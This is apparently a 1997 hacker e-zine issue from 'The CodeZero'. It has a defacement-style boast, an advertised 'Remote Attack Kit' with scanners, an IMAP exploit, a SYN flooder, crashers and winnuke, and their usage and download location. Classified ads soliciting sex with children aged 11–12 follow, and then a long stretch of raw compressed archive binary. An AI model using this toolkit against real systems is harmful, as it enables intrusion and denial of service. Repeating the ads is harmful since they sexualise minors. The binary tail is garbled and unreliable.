You could define this as an act of aggression, or you could define it as us, the hackers (or crackers), just adivising you to try and make it more difficult for us, at least employ consultants etc. who have a CLUE. because one day, in the not so distant future, the internet equivalent of Pearl Harbour will occur, and we will only be around to say "We told you so", until that day, we will keep reminding you, get some security, its better for you, its better for us, its better for everyone.

In this case, even though your system runs HP-UX, we advise you still take the time to look into all the exploits that are available for this operating system, and then get over to www.cert.org to find some advisories.

This attack was brought to you in association with 0range Amusements.

Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik, phractal chaos and all the usual suspects.


In the meantime, maybe you would like to visit...

The CrackHouse

Micro$oft

The CodeZero


We 0wN j00r EnErGy!@# wE 0wN j00R LiGhTbUlBz!@#~

=============================================================================== ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]== =============================================================================== -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\= =/-/=/-/=/-/=/-/=/-/=/-/ Version 1.666 \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ =/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/07/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\= -/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\ New, improved, here it is... =============================================================================== The Contents Of The Kit : =============================================================================== dnsscan : Mass DNS query program, gets lists of systems in entire countries, or all the systems on a network, like *.microsoft.com. smscan : Sendmail version scanner, very useful. phpscan : Scans hosts from a file and outputs a list of php vunerable sites. phpget : Gets files from php vunerable servers. phfscan : Scans hosts from a file and outputs a list of php vunerable sites. ident-scan: Scans all daemons running on ports and determines cool stuff. imap : Exploits imap bug if port 143 is open. tcpprobe : Very simple portscanner. fingah : Uses an apache hole to finger systems if port 79 isnt open. synk5 : The SYN flooder, basically kicks the shit out of systems. octopus : Octopus with UltiMods (ultima of CodeZero), crashes systems. winuke : This version allows you to select a port, I advise 139 or 113. =============================================================================== Usages : =============================================================================== Use this command to unzip the crak.tar... % tar -xvf crak.tar then it will be copied into /crak, depending on the working directory.. DNSscan : --------- Usage: dnscan [-file ] [-domain ] [-sub ] -file Usages as a list of subdomains and servers to scan. -domain Lists all servers in a first level domain like com or net. -subdomain Lists all servers in a domain. The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode. The input file needs to have the following format: [] To list all servers in Japan, do "dnscan -domain jp" To list all servers in the netcom domain, do "dnscan -sub netcom.com" SMscan : smscan PHPscan : phpscan PHPget : phpget PHFscan : phfscan Ident-Scan : ident-scan [low port] [high port] TCPprobe : tcpprobe Fingah : fingah Synk5 : synk5 Octopus : octopus [port] (default port is 25) Winnuke : winnuke [port] (default port is 139) =============================================================================== Where To Get CRAK.tar : http://www.codez.com =============================================================================== It can be unzipped with WinZip if you are in W1nd0ze too.. :) =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== --------------------------------------+--------------------------------------- | YOUR SPECIAL AD | LET'S BE FREE | COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking | for men, 12 - 32 clean, fit, and SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters. ADZ@CODEZ.COM | Call Anytime : (816)781-8009 | (Ask for Tommy) | --------------------------------------+--------------------------------------- | ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@ | Looking for men 11 - 12 for adult | Yeah huney, you know you want me, video satisfaction. I am 35 into | I'll treat you just right, I'm Professional wrestling. | waiting for your call today! Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154 | (Ask for Kim) --------------------------------------+--------------------------------------- .oO The CodeZero Oo. _ /| k0dek4t sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@" ---------------------------------- -- HTTP://WWW.CODEZ.COM -- ---------------------------------- Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#* crh004.zip100644 1751 12 56677 6403626662 10276 0ustar wheelPK <}"eX Soltool.gzt#3soltool\s6+6JrYG84Mw8;7&A 5E>H @=sgMbXb?j Ko]Z.> AE \2Ceh[~!"|BfSYm v'K:aĆaޞ3"L"C\G X"5 B.|lnX<,pCfX`G5t?DP}nǞ읍qjĂay8l&+d8XGE G5} Gz_vW> oah_P or6lhq?yЀ0fЮ7``]3pc_ɩLxtA_ħ3xHl$Mo/nq f9(H>BQ1 >,DͅfsY  Rfk oၪ80$bS4aFy|,Scl峼zC8#%ꛆsϑV`Pd^Vi30_(%xB_~gdEZu=8؊DŁ QXn 1?5 K!irzBjy!3ABBu_ Bs@a-X}٫ZeEUEי#[3 0J]zW9/.}wxS&:Yaxdӫ̈́^=`UjG {Ub,F0YqN%]àG^We&[zsE:-b%ˌdz4nd; phwecН,RzTXOT)ۦ";mp7QiQ(umB,g;AHI "ru{P&sۃ҆VT j;ZNYw {mHkk^wug(3A[^t7:9nq0 6 Ck4Z&b ŀ5\zwF۱T*j9цp桡m"/&5'C'=k&b]Xú1P6)Yݨss-=a_UֺC[Βw6)W<\3lFB3-TiV?>Oȉ1n8Ca#[NiL 9Ӄ1l1QT#RI0XiPXliRPJs<Xii]]2 "GI NN)ʅzl6nS8rxJ5x/u+8=;Py}ۋ9:B1#e>jѡcqξWCk[ڂnwӳo;9>>=:^7'׶V{R{ Y l/pXqu>:v>~tGOW vnj w0KbuۻI,rWLw%b VRnI}{RbFKEKAwtW jq.i^j&Ha}QZp^ zg^VkxOy j,QǯqzJmCTWx}BaȜseX.{Err|E{#pʡ9v:yG80 Vz a $8q@V$xM}QUTpXKQ\w8d같MPtKPXu^AMM}u؂„Zϟe<<@يj:0NPI3tu+ _\M"7%I SGj/&y,XV{<M:Y*ca7oqLfks9m&-Eg%T*-Nc:Aaߤ /< %.2,籉.YRr(y2"M1YPHfX0ʒJeϳ\[&{y`&{`&dn$3z}>n2cisYꇋL&OMLeJi"˞N1{J:eTN4`+W•B?ZM]!_ E[EqqӢ-;DzzbctK KQ}>m'dgJp=UGdkĿYf<_zH$;#?{*! ˹ĜO)#Ȭq3uIwygr_Ѣ荢@2+DÂr]ND@G.R9M*Mdlt<OUrU1GJo!bIl8N2.Q)(&y;y1!pU9l*4I\0o!Lj{ah=ӎplނuCщl Ѕ[Ca.F'}&O)C":+S]qid+b0dC*') eK( tL6͌욲"KXkdB#$mb\1.j a*GK(t]Vd؃t6Eɲk)k<߄T]lbrVEk'9xA5_9׼2?MDH;>ENZt>Ujlb;0.mOx5EcSFi2zYtrj d; {c#76pɁi͏|쟼qAEfUZ mk{y0 ľjSX{仛3WW̵bDEJLuAXKW8:H,Ơvn<;u6w^bc7xjѝeǶ󱘘omu1m77Ryc]-RRy/.+9G=aoYX 3]&:4qɬVnЅ؎EC#jAu:tվb֟ u};Nodjw@-d硌AǙĈc@wkz1/\y@x~b0q]j,JÑ~v]mz(Py艟tz5|Q$߀#O U 38"UDZR8}:A'ם?cH :%ip *m".^M^ݡ-OC2Ğ B=[LT8PxB^>^8'_BC2V:3 ?q'F0㫊i͓ø:zva&/773si8䝄Sv&#~\~G^,Ꮽ+/+)4RbD&gcsyb?hڇe8lݡ%jr=w?ఔrvH=|m}I5[ W.-셚jܛՇX"%~둵d♐p-V'X+KMbR~0D_#H&{ީ80Yه'*Qw~$sx+6;;,Mk摌}+΀ 7_njiה#q{ Σ0 SLTpN5 c >ʤּ} 13ba"0[Mѓ0wT:2"P'*c4oJ`'WS m*66=fpdƙ"OԢ"opQ^hɢh1RA(R.kp=?8J^ 6@6MSĈ!$L-ܿ)֖r.!O 82JQseB%f",͝ Z1)`(36S"Kd4!K,ݚH2/a6>ܣL h YJSgo@e$k33REI8pݾUp]ֲFȨyr,230$렖wl άP}5Ei01CʫmmHr'_YdX4kپթVJT'g.x(:9k(Vc r$m#*g&nbh* !97C<8e,͖ٔa؄hUUm|=ȣP ds"l G q"1UFjQW5,W @\G8˕7~NI'Mze2vQF/Α0$G:vPe4N+hHfIGBp#@qqDvP@wu7CX69Y4]F7N={|%bN,Yfa S*/* +l()u )*Siwu`Sbeip<[ ߥJs,^x nrZ *Z9(|.1=o#[ް]mE?3)}>/MM+Tm7XV^P-@AҦ$-P}ݭ6|z)[;?嶝Λ~W-e[{l_ם]rcV1ׯ|)5ˍ6~MY~K-\Ef 5?BP!K.[#mF&d"p23Wo2 gDl^ַ=7Fگ?xƈx&-PBKO)EE_,3gS)5ٓâ4Lk=UGyaa[@$^CL.V^$FfyHȫYG .O_Xx1m5b}f` /Cqg],)^jQ9#C]a"+kF.=ttk[$ԣ}5jgr IgqĎ/녧yrL[`XmKq/,*]*W.ln=zOzuy$ea?3+qJ)X-93xf?d+2>A*g\QdE|o\Og]/Ŗ/ q3 |[8 u3iozC5vt$,0BJNM=*]_jPovRz;wH''J Vt#|N+l| \2vX*B>N #=(@ܢV>SB<"WPAϘ-lyuމ"3xGETZTH?&urov(ßvd8&TKǺ)ʁaC.0mi2F#SDbX࿜N&dQ++)}V/T0ʣnc#V<;" _TV7VW^)g6f>y~>5|jKtz7~~7Ӭb_gNvPL[h| pzʻrn ^i gL3@6\k3svJ#nϬeam$/ּ/{~~РQagtj- nBu2ѪC{!N3V}&Z)/Y M0sԊ,6ဎYc4Ay\ڍP}p#Tgռ&p'ӂsz4 (HSI.)jlκ[[B3hԧ=L!]L&ji$ z&,ۢtVspXxEDvP#~p}}`Qt?ڊnpҷE5i)oށإaw_zԨvfG:X?|Z+<\8pץ_A+nfy3ڨU3Eek/ʢ Vh)wˈZsv?3fi742s~L w|vIjU2b7O+_sYlL|vanWq@"˯vR %(XvkMXݨjJt9.muܞPem#%y~ҞJR=}(Cӹ i e_a/a;+k[V y[̿љ0:JCg(Y7+T >7u: ah8)(2>Ȼ:V>t8N jbXJx?Oܥd7(--Z*4.MC}mBGc͘>gtv}3ݍtBڞ]fgD)͜(}F|w:, eeL>Dhl>r>/؛&Kkf/yS!Y<" T%㿒s0)a62J/[x/2 YV/{V[*[v K p/Xvd0"X13ZŞA\s<c3̎=1 >Y:nO贌іMNa:h8=gW]'j=ǧPx?d*_"-|V WgO?M11y=.vnmo௝>7b{glwI~dz"A1,*+xS1tqS{^A}1Ğa#єOI::BFd4h}q@]6իCIG(0նe&t0g[鸓R?$: ^$)Ꞵm*"m@-"e;@$byy'6?1HLu%+ i=CJ@p(V sY遶 ʚ{ ME;!ۂB4Ũ6 ia,&NBq. H/o|Ρz J,1 W5\ܾ0 v5GCPr8/a;h1LScX1y0%Q9tS00•qGu<1E<=%87%bt8sk}G'pqr9iq {% W LM9 aI$7АS?ؗ a.S;s0l f>i3g܁op,Vh?=އ~{QP` )N4<ũ=Wqxcx6oc׎S3ދy1yQK)?B>/0夂-$1=/9(ܳR1RE?_` VVH ÎBq!sDA3CHn_P Рt|?-7 wCxL OkY.jR~Z4]bRMϑ SZ*c_W5b7kMQcӝ+Ι@.:oKi3!tL)x2tA]d;^RŚ+nlgv -BiPwl3(&\ٻa4\r~̿8:l*0Rr",Ze;~O}1G |?zVd~E {?Q+(ܡg_V!e`3A Q$R qEr$L6sr؜NaMѢ 7vЪxT@p#ݳ.r,Ɋ)PVwJMt砙ELP悦KAjs$s)ǦD`aP;g4GI2AhM . ( qgS/ :yFTwBa1_y`@3jk/agd}"`Zvn Uƶ(CDh&Sc8B>Ժ(u~5fek&}!J"` d^(8+|#Sk!g`X #t;j8RR57zg(q 0+S{*4&3 kp@ Gd z<Ņ`h'IxOgj )*t?DĴ%Dpӏg4}MvZS*{{өcz]k6`=.P ¥bm[.2ؖI-G80 ždTD 8'$x$;D;tfҔ^𰈚#'|@ԳǠ.A ֌LjNi=q76\Sd́o.a/ {)/$L!7pА5BDꭰJēaX_KiPRo~o~dIzeɚ`*__.QW'4&[VW93,؞i_E\%Oe/, H?p4ww~ɓ^XMlwn篂|"j*l%c1soF-?eo)a'Mx[ 9ugvocbee)#l@iM\~bWoWժք䟖{f٦7Ƃ.-8oWM%jT3:%,jZdwyܸNךՇ^[.NGvI:t|n%*5947|~bwhՆ};Ú;s ˿}:ZYo¯h|A= (stptVTTWN?mKxS^MS,{/֥15ne@ǟ3K-3ºcRSftmMӵf=a q7鋺Հz[8:[AX&D5'c%G Bq&cЧ/`'0UUB72TDUX8AɅh|&L1`ZXA@RUmhYҡ170+4~oƙ t"*+љ|?85s:*zT zY|j7#+sNMoRwljZ]`dS/m3qKWVqW9q&\{aGMdnsslرg8p.ARXp&)>Z&Fq07ŊիTZ :ΕbU0ۗF/Ywٵ+Lq5hEEh%wKTY IM =LtJ4]KRr\݅P7mFQfS1̄H#tuW2=?Dd]dx֍`L,EyX0g3 gMկFTD F+\}TNakdՋF ʠRyXHdE3>y6#MW\QZ`Bpڢ{Mn. T| si_ t6Yʻ(܃v`nmalYs ᑡ4SZD b} 񬸹T.䬿)( FwVUr*H~C+̾-Êp֫`袧S&j^7j*avoz<2+"r\ KwݎbVQ׆hVm7f}ETg8M,%nܴa|'ܴq ;V7}m 7nܪkp cKqkkÐKt/|4\6Hjhkø6հ ^a ^TWæ6{aS[ 0M}5lkø6հi ^4Wæ65i6[@ihe6FDN' Td$1 H"e62'r@ٰ[^ޘFhB' elT]q6X)>ܲLmwy5M]<͏[}y 𰧕sH3W%@BG\|u%[@0"t9?@ب^VT42R TeUT6V'N\WJT@]0(ᕃKsךƝha0ʚ >6N7oUMSֆ!00]C+6 9cgfɃ b\Pֆ!S,;:;eimzm"rR1ݺ,Z(BX|&?º7xs?UtLnx& th2E5t>G}o;5xƵk(;o XgcmL4GwM9<PQhRjERtW+Lwo0U"Vu"mj-kOb O׳ތ1|lA"]0"][j^=6bN&Y<{r7q:´M*`1T0C ލC :Q'ƮWF?$Z}>|21Vzv}.û$07Uhp vTo' 08(퓴;3H0[phr{i=խax00>Ǟ <]~_VuH2-uw'0E׬'.5P9@DSLf׵"N130+SIM6&gbZJTia('e̗hiFYĥZoQ+; .5.[!YzߋQEc+`G~~OoرL" CdY̥\ p\!YHhu w#iƗ^J+=enSN4ȵ.Yf_XaB&B|?퀳+O*W(IS%ؕ9zBi^2/+,gyeU%P'wn&Q$ǻD46w[#it!.9I( ,J32lH3K(:$[EAfIc^h=G ğ;䡩HW.ѿqG=3j >6MDu\`I,C_j3$^sՔ &LJFt*=$Lh4!`!qWrx =vnht =FxMQ:DS7&@f*Zn[vӼJ5=3G8? yeZE}`E,lVO Lb}dN#A<0Ż:o+v;SirM݁#Ԙ@JFI )w̘-#6I47/ tXȖB 2q"JO3&DhuZM&wqqaoU䳒9΢,A(S:+4At$ BΟ9xsGOd-.@9mF&K"L3pǛc=hhS[,5(,>Ӧf9Qąġ Ih+eХ⫇Ȑ*|/SHv !nR'-ws\EAץk襣cW Upe B1>hHj=8&DMDj JG!H@VL nCVWP4ty$Ш֋^i"5(ItkD^573z7FXDl2/D?7R+8ng+nS%>M0%(D dnWVwZAU32Z# Z@³ 9Kqs07\@Z]Sr,:.?}]ݳ RS}7}sӬGPz朳fMWg]_$S!awԽK%hmC9X t%Y^}\B~\.L(r;5Lo~M_'XĤҳg6LT=g66Ԥ4a)/2r(hne666/7B]n5PH-a/wɜ_דuWSN:(sVY0+MvX6&.S2r:<67?q9 (ЗO}}7Oa“"ǐ /PG-`dþX朿/ox/7Xwt|r$D-tеVwXE^{#وϺ\ldb0e t,@#ft'ݬ 4,K{ Rc wtnj y:7K?sf>j-$˄eD I6m+W9 Ô(~ 0]`*+ҕ!9֬ xE4l W2S,L{\l\'yrOZ (Bd#Fpf3}Mr/_~y9֯/fUkOr;MΞasdBpWqmAWuBۭ5F*&Z&*v~M|&"N)~GEVd#!k,ҭ{k]gfvn%D:KKT9q(_.Ɔcy?) ҭv]m[BE…sOswvp|w~vW R>ݳgXG 3;Qy'xP=)&\m z p==L_F?̋#կ_|z_/} ?_n|O<}T˳<|y<&5CSZu1|M>oo==v6 y}K'(;<K}߿9:\zyZ0G/}>HFKG?oNQ;jzk>3?~m^yqh=owkKN Yǧ4-=T fFO!-µg8-5#9տ8PS|sϾ>:N!r/1ӯ><';}7Yhtt|wwK<u==GG&DG'KuӪ_k>iIաyskS]+^|{t,c]"o~+Te/G?RxyO^b}y]Xeڴ@FSv_,'@zj#a!Usnϳf0 ")8rȃK͟f{gN8m+:>^t͟B694M'-T:|}x'4/I qja%rp |'|U =>ӊDxW%/p|:xWx8 l(ѩg95 siD=0y4SKV;eHRq ʦFUßӟewU!x)| uf(X\Fl8Őƶ 97NpI§XC]n221'ѳs@u!c@7`2BNH5Fr&QL'\:2xh͚]J & 1VTp 'Č|D&'S>~&D/[>h1p"?UD .7^^Pνw(߅-$E3 YW.끃R$.d*DC^.d'oNyX8gPa7,sgdc2w\_E.o@ҙς 5<¡kyNDƚq˻@9 yT!p2Ä́/M-b@{`,rT0[q&'`&`s mF#iTVՠ,C@هf(so2 jXd;.qC=-B6P` a>l.7qӢ@eIEµ! diEnK5![T\17nn"H@z%(\L+'3OElmjtF<ŭ"T^ -!?g&/`yT7ҕ]HRK#/}sLY'ݹV-ݪSQ9"#vSh-6ӁVv,+}˽O/#Z6Kơtvm(%V@xQjlc!>xSA,؉b;2O5~FP7|2/QAi4}O>ѻ^Z+%aJXTXw_͛2V\}.e9.[f"䶬\ a.Y!4>v.fVY&T"y Ɍ fTh$zzc@+{n)o32J:@֯0HM|CYnMVMcX8}T1+ebl3xi ÖBA@z_nS.3Q좧[3GeGL$ (&T!*YA3|Fvvxn\$O `-!1v!D B/NB̽^<γ+|)TjgMI^G( _ÚCfTɭj[Ro:LV q!=CmA ރe>h%y/3@P8ܪ$)JTfr&@ݛp  'Zg&"n  in3\]ܢ^6SIIƵG7ewΥf#i@|H,uw'z1n`ᮾQ ޤc|M5ZŪS`T(GOD1V { CW.:VqHEx#\}6DuO?]mOH^aBuJ0 TAH6/Q׫LlGbGyItrN!w"fw{:e괛mn@a?37uNsLq&08a7l7?´fn"hIaH E}# PȒq%4_h$`)Y I`J6A#D~+o<%%ٯ ~| eڋy4 r0 э 8ÖކCFxˇE4sߤnU}Ji:3>V D~R7NwQ6xdU} WmzG Rأ$6f>V<.ߦ]O2:y} mnmOPq6 d9w mt|9僆*6nj/Ƹ*bCc֍M>LE2s~LēJ& 玎 w~*kX7r#lBo-dE?Y{K*iz\WZhNB.tعyd<Z؝yI7=q>\Rb%@;Ot~X\L,`s3nɟ #xjx 9>a;yg*Y (F.ѷxaKlë{d/lD'V4K M+V"=s>gn~m tX0.€ymOFJ+Z MfUI-h=d: .ۊ}pnR F;"L)Qʼn0F^QEI(͔B.P=Iud]CyY(G|eZ!_1h>XyB|h D P*ZGf JIUPf'5q=i0Ҵ.f+~xTf>,Rn]S>|q(U/2VVBd-&?>A%߂lC/a'P:)Z%%CX0MW,vrKSQL*IU;Lnɵ/`5394yIy;kE= IL{: mnSr'_'e?h{qz7&?80 }t^t.K—L:$|s>ih+W'?=^eĈ d\YN˱ :$A JJK$dP3ȉYTM6l99h4HEcm9{93\\L^ŎC*`P(l1|K>H۠ߡf]-&fOfoךWSOԣk.hICOKyȀV^'lȘ_P2*0n=]xLtD ow|29?x4S}VK7W,gP3,-k iXݽ;eiERt>V'VO&'w4p+{nT?[uw,(,{#}ﱺh$; &/n/(߽t\^u[;C~>Ihp '5FBG7c:Lr{LH,'%EVCQwHHfƔd%UIJtgTQZ #DkKW9jt!@3dbKh8?HߝY8n\6:*VLǎ`/PkbbX ,lO>lõ/8BڪK^4*#SZc&D)S1!pq׷ڑk]ؤdlŷBRTV #RS2 |-vfòWvwGWzmЄj3b\y3̠Wn<Z[Ay*ٟ]J/[:ZD:\'5b_ܓJ?'S09>K>;DM kMG cH<%\`+@X6<ͻAEJz;aTkQH!#Og.jkj~YD s a5VTƳ59 :e) 3$[olfsηiվXyQх3YS zwY[*]p s/c>P,u;Sok{˝K\Eٴsϗϧ^{ΩQ}ECHtLBHڵoϢ22s[|J _LAD8xC72a鋹5ֆ=![Wc;}]dx$k:ǘH)yqziOIk@Ã'T?0wY=``z1j|MGOpћ ]Wwt/Yo&|.;]W4|frҰqS$Xgk|({$bDf2:N룊<"E\:Յ2F1%Q6waYezePECPKݢg 714 Hꊶn(X-g*Oǥ2Y\|ͷ4Vfͼ,PF}ҨJLD >̙HHjs(S"mH Vf;wϕ0.GF$UJdO-u<4 ]g%z}x|U(ߞOzemO[~_cAw} ug +ScpĚJA)hb t=]a[X|4Oi:B ZKx-.z GۣOPp8LQm/ֽ)OkS31O5qD8ЯM&F5oXi`l8hޒ=޳hDAiͯh< ͈Ӑ3O.өd=fͥ(@gS$w7*gzҳ'%wNB'޺|5܄ !:'p;nNXX#+pI=圄^ՙT_OH`t1:Yo@7ϓěcnu~IY wХH$-ۈ4]%:#hkޅyXV^Mw>);N*ڬA|5-JS>| Jo=' eQTOd@܏9'әzӰ@vH=黧~=E 7!~N]ΌGEelSܚV@Ѫe+Aw }|Oonvd'؄yWn($_lO/z݂ᘡrGtĖN Yb !_%"z 72ŸIhAHZ6;KMM3kx5d+7؍/-mQf l9uIqyl׀;n+d=A*6.d;mnA M5[}=>A0˴IaѼiWDTRM^{󻇷RсՅ@9qv_9L"H)a{ O'R$Fw]k&/bN?M(FUnuZ?MTƼaFbnvhDwTa?`9Aŝ p(%qSΘA#r.F޴bOE.F)ii4\kT*ȇ].GA {tD#`Qiu420 6bVP\53)1$Tf,/rX#II &rF祘p 揦cacDŽH1^ 5Ȕ2~T!Jfq?#m MM/ ^Ҏ~fzyN?:g]1lmo>aTZE,|,S}oQ q! ccRMf7Ѽy mIRJs eZ69B:k# E1M΄q/N02ږ (̢Dth8VIj -KfP|hyo=+2 %}Gw<b\as>OEE[xLzxsJ{>ľre$K@o)W %rE $=?Ht͍LhxzQ)hPKkFLBw>ȨO|H}%so2l7)IԬl85p8wiCi(%ހd5{3znrÐ\[ dl[m Y|k;ZMo+ r%[e^yzSogʩGkG `=U?Su+%Sᐆ=v.Z*rlw.Bܵ>I =Ȧip+,18ʒ0Ջٶ;Aٷ"܂O-*6 ~7H2- J.V~Ө_JŪis|-|(-<}FΜ$o//Dzsgޭy{xʠoWGQNjI]R5/Kly"N.%}*a\-8GoA$5 &Q\E+`]ٜ) Ò1>_^uIϰa/.1^i9{|}3%Um <I ȝY>R^# 9x|*uG.`_ "HoQ!w =>Zn,}mՉ>Tso?%UnJ! bM^ LHYWiHϥHK)H/z'_4C@Spt;IU\=*|.pali 2%WSk1br4:_`4hl~}뻑i<&XK.黰}{iWgʓΗ( #D^uûi{i8M:Yqg{U3y@B5zT 3gfS.@Iݶ(';1vٛ{UKg0ҏ7( ݛ N҉{ue{Hܩ~WOd2=_ť57!#M:G!>w&wF*Q6fpjyGfW#WuּѽF. X3 rZ5q2)Dh/o"q75 N}GRxx3"صgڞ.v)iT;"T׹({e]'j?r;.=g|Pb={Cg@ZXx}&^qU?qA)@vs$_*e$ tT֕KD`abp]0n?mYr%`|9dhE3ъs:~'["ߍZD&:˜8Azux;*cqNREHJN }vjzmru٧+K̊^j+H Ѫb>hj\lhǖHc~I8/UGKUG64gmyDnJTH_R*`h]W:N p3T}c *gz1/͚3%ބ|ꦴJJ5xI !;L;ru#S=|M[3ѹf{zCew$ҍlԚ("0!Fk,<>FաgQ@co6{No^a2pTC&A6yd G<{h*ڞo)Ē=UE~/\BYPhq<.I@kδQqe,)q )qd}k-V,/eHhB=]{- &aR{,|@(٩뼶%250_1#voչs_>90-r~na|2ޔZgͶ/ +z3 ;swlgk<(=,~Ļ%%ԄL=%sV]&=JsvE3=+>ˎ߇;Ȏoxs@;^[Jyɲg pPd"=1_$Qֳ]mhz1Ӣ752ř$ @s$ZRQs"?V)^r( VM߹YEA Hh\%82Dbz=R{][/:uc~:|_5b3Ye>͡؇@($R{Ŕ+ ̈́Ǐs)43u|xe_{0/S+^SBJp,N-P<(^Մ L2 30Hdj)jA]ꐲÂq5c3K=akN#**%[`[u .If <3@89ځYÇtF9ܓ뗪L:ӔngcgV *لQ1{{[ms+{o) NN }>Cn}* tnCh躶z׫u]9Z,Gz/5Cê(Q}ʱ73 Nk-2+ӹ0z9:VǐC0"SjT;}  Z\߭QǺR7H'Y]܍.֊$l)(Ae//ު:(;-0D{2=*}i҄C݅ƄH[^"{C c_JPgڞ8mB۶/\^V z[ ߁QIźLs@^GKD^~ٜ Iu0\1R j}WY>fEkoB<3-n >u[ ptԧ#rjRTټ&|AWdL )W `y(|+b=j%T%.2XfNPjt KC,"z5ֵ3ϚbKb`'F<ꝙͳY, -CIqq.bU*ݙ;4ܗ:%P/v~}MƗS* CgW@@?W]㙽VfmH< #  _꭬W?H Z-| XgIʨYQl<9jcgTq0ɘR1l\_̾03re)~#I-:3rpqj?ˑ65_RXHOk㗢}UB)"` _'L3_οIrn¦O1شIs%`%wMFTR)Q7IGf.j~yFaKEa(l__!Wѝ̍mZZ+w  RQ ɼN7QH)ݵeӐ+7 +oV&yJ%QD&uOmFެԌ ɤ_܄퓨FC KvJA #<V# XQ϶)xaʃ,7*ԗ\nŸGx 0KuC=6U[[D1CUN^~\t_O01s b]q QV?ѣZ+;F6 /l ANsdvص ʩN iP)F)_ ߸l؀ -{3#'G|AOv1çQ8h3KW2[ D6=b&{ԛgBo4cXcӛcI@op)ξl!AOٶ@)^'F#vU#hq0+3kmE *'_lC/48AUSƒ!~a?+Rj[^#qp9úCBV}li>fiy4:s(ٔռlyp{#7(Vrq-W&OȺ[ H)`pjJaJ*#V-j[;2m,,RN|5:CH/+'ц ]xPT^2[ n@sJyUW?זecՃk6jۗV ?͑x*GI3zNm!s[q%S ZjA? M\/%"mZt7xbj!_'!PYs #:Ȥ?jq e1~a𱓬q`+"NL7'5qtPWUJ\ļOpj[O5GjN)wSv'äw7|I+J긪Pe؈+1U-g K̄:83}cBގ/8{LU\c^ |>Bq)D\.("QH*ױ*'2 lKV;6!YFt t&6KQ{7B}4?NLMKM>[6.tLIy 6: 5{ ?&rA:4g"ǻvT+>D._P%bHSnߡCoA`^+tP<7(u.IFOLǮmdaQ™<Af tuӦgCm`k30[f}V 9W\:2' !LjRr+Mw|HlAL=LgK]AMϐq)67yn2e1)J~?=_~1bT;[t`MCeγA ^]Bly៟ ssgzѮg oG a=Ȝ d1{w/ H3Y̼S]'V8hlxT(ZkCM9~%U3R9z|mKCq]TIecLMtw>VIw~GzOUrE1ʁLb~k* Ålƭ5@ *3N}v(pA/{C *'Q\$X "xO"Wh,bvvc(hZ!3 QqF}Txܶ:beÑ OqW8c Й=.džep@)Gsʱ4f3LV/,S";"G%f+^*{V'KSӅuFCdq&1? %uN#zrp`BM+-Qf;&'ݛ>8|u @O\3)xujQ,}eYCL>Y{ޏ r8JXx+'zsrH^VnaW [Q͘B3ym֥ fm.vkt!aOFo'[fo#c[WZ$ Y!)ZgT ԯTz\ʹSuܺ0 \b\“BMm|uM J-ݝ*:䫒 4(`:$JiFDDŽ\ !M۬f*k KH"*avL9sۊzY"{5So R|3mMĨgIR\ i&S^QJčUׁT5@Zw(0IЕh )M<;hjEA(3}tp>S:KfPXEQSK$խ(<4*6 i迤Y/¢dM[ cRZJ糖sBjZA2[aKOUGuk*Nl{iWsu K]?cd,<,}:5֘GEƟ9w5 U.z"BϹ])4R^d;]teD҂h= ١Qq"qάQ? JM‹ oRמ֧4iMzEe[!@Dc!zen$2a m6 q٧&'kUL_MEMseXzgJl>Dn<ЉXR9Ы|hH ='1-+2YA8T1t/>oQS`a%F)0zOxѺ6+'Bzf;BȐUfhWEV9)J_ni)0. M-k4.UwgS@ľMdHiF+s& )FJx+H |9xSY]pH&;7),8*he>৐DTu5l[>W*e-`$*lW%/wc[*_K?cLy?ZVu>ق9S5Cl^txwf'!8+<UXwe&*̕JTkG6QAlAQqv}kX(C.Mr .u`װ7?D  JG]3|WH*) a>kKl4}8~h^wt>Tma mŤxmZE <W?0 ^fߜ \Ux^:.:vzBz_]qXY}Z` _"[C(:C1z>-*g{+g3ȿ 01)z`V0Lh_ ]FJ;: OlaKv2HΉ2|gQ7AERyT4bcr+,D \.\13@2e'ێ]k7.Y_idap~Q"ʪ[r@vv B'ȜaFEMWIH<ܳB,y.`avjEKfvz44E1AܢN!IJD{ 쯈4 Lhada-$aG>tRUcp; ixKXnM좟*Ι*Khg[\ΡK3=^bu^'dKNߛr(3.w~sǎ ]NPkfCG-Jsf/,?&JH4̝RҞ"R[^|V[ A$99@lK_E,e '<*uU  6̦Xn>= ʖ]$ϋE ''fi#R͞O=jUߥ#͂cP)7i0wvZs.pD[DU) oTī[T`C\}]{ئH/4J# ː7CT#izR=ڴȚ6Ҽf$Jޱv?vNN_{P2h8$]AAcp&U^*yfjvbt hDuMl_.}S!dc?yp;G+j&i(7¦i̗b[2wΒee9Ec~nsLf޲Td?nT6znpq׾AugY1)˽wMyo&&bXqUBw:ӪV->ơfm{Nkt 